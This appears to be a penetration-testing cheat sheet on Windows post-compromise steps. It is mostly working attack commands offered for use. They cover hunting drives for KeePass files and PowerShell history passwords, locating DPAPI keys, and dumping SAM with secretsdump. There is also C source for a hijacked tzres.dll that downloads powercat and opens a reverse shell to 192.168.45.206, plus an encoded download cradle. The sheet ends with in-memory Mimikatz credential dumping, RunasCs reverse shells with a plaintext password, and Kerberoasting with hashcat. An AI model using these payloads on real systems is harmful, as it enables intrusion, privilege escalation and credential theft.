Post Compromise

There are several key pieces of information we should always obtain:

- Username and hostname
- Group memberships of the current user
- Existing users and groups
- Operating system, version and architecture
- Network information
- Installed applications
- Running processes

Display network and process info

route print
netstat -ano
powershell -command "Get-Process"
tasklist

Check installed applications

# 32 Bits
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

# 64 Bits
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Display Application Details

powershell.exe -command "Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*""

Searching stuff

#Search for .kdbx files
powershell -command "Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue"

#Search for txt , ini files
powershell -command "Get-ChildItem -Path C:\ -Include *.txt,*.ini,*.log -File -Recurse -ErrorAction SilentlyContinue"


#Search for .txt, .pdf, .xls, .xlsx, .doc, .docx 
powershell -command 'Get-ChildItem -Path C:\Users\dave\ -Include powershell -command "*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue"'

Checking History

Get-History

type (Get-PSReadlineOption).HistorySavePath

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

cat (Get-PSReadlineOption).HistorySavePath

cat (Get-PSReadlineOption).HistorySavePath | sls passw

Get DPAPI Master Key

Get-ChildItem C:\Users\dave\AppData\Roaming\Microsoft\Protect\

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d---s-          4/1/2024   7:55 AM                S-1-5-21-2309961351-4093026482-2223492918-1002             


Get-ChildItem -Hidden  C:\Users\dave\AppData\Roaming\Microsoft\Protect\S-1-5-21-2309961351-4093026482-2223492918-1002


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-hs-         11/8/2022   7:36 AM            468 1a65c284-d429-4e6b-b7ab-5fc1a2d95636                                 
-a-hs-          4/1/2024   7:55 AM            468 3ff87438-3511-45ac-91ff-611a4521838f                                 
-a-hs-         2/10/2023   5:28 AM            468 7ba528f7-4e73-48a3-8a67-e5680688c9ff                                 
-a-hs-         6/15/2022   7:48 PM            468 d713cea3-8216-4125-b4eb-26f1b4b313e7                                 
-a-hs-          4/1/2024   7:55 AM             24 Preferred

Dumping SYSTEM and LOCAL

impacket-secretsdump LOCAL -sam SAM -system SYSTEM

DLL Injection (if we have System32 folder write access but cannot get shell)

tzres.dll

Generate a custom DLL and locate it at C:\Windows\System32\tzres.dll

# run if cannot compile 
sudo apt-get install mingw-w64

x86_64-w64-mingw32-gcc rev.cpp --shared -o tzres.dll

rev.cpp

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        system ("powershell -w hidden -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

1.1 Additional (encoding the reverse shell)

echo "IEX (New-Object Net.webclient).downloadString('http://192.168.45.211.ps.ps1')" | iconv -t utf-16le | base64 -w 0; echo

powershell -ep bypass -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAxADoAOAAwAC8AcABzAC4AcABzADEAJwApAAoA

Open listener

sudo rlwrap nc -nlvp 17788

Attain a system shell access.

Printconfig.dll

Generate a custom DLL and locate it at C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll.
Initiate the PrintNotify object by executing the following PowerShell commands:

$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

Attain a system shell access.

wpcoreutil.dll

phoneinfo.dll

dxgi.dll

wlbsctrl.dll

wbecomn.dll

ualapi.dll

Mimikatz

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/mimikatz.exe'); 
.\m.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit" > mout.txt

Fileless Reverse Shell

powershell -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell

Double reverse shell (runas also have exe)

iex(new-object net.webclient).downloadString('http://192.168.45.160/Invoke-RunasCs.ps1'); import-module ./Invoke-RunasCs.ps1;Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "powershell -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.160/powercat.ps1'); powercat -c 192.168.45.160 -p 17676 -e powershell" 

#Make sure 
python3 -m http.server 80

192.168.249.187 - - [11/May/2024 15:14:01] "GET /Invoke-RunasCs.ps1 HTTP/1.1" 200 -
192.168.249.187 - - [11/May/2024 15:14:01] "GET /powercat.ps1 HTTP/1.1" 200 -

Local GetSPN.ps1

powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.211/Get-SPN.ps1','C:\Users\Public\Get-SPN.ps1'); ./Get-SPN.ps1

#Request user svc_mssql ticket
Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'

wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1

#Steal the ticket 
iex(new-object net.webclient).downloadString('http://192.168.49.211:80/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat Hashcat

Copy and paste the hash , remember replace "space" and all "\n" with "empty"

hashcat -m 13100 --force -a 0 svc_mssql.kerberoast /usr/share/wordlists/rockyou.txt

Cracking the hash with hashcat

PreviousTHM Priv Esc NextPort Forwarding

Last updated 1 year ago

Was this helpful?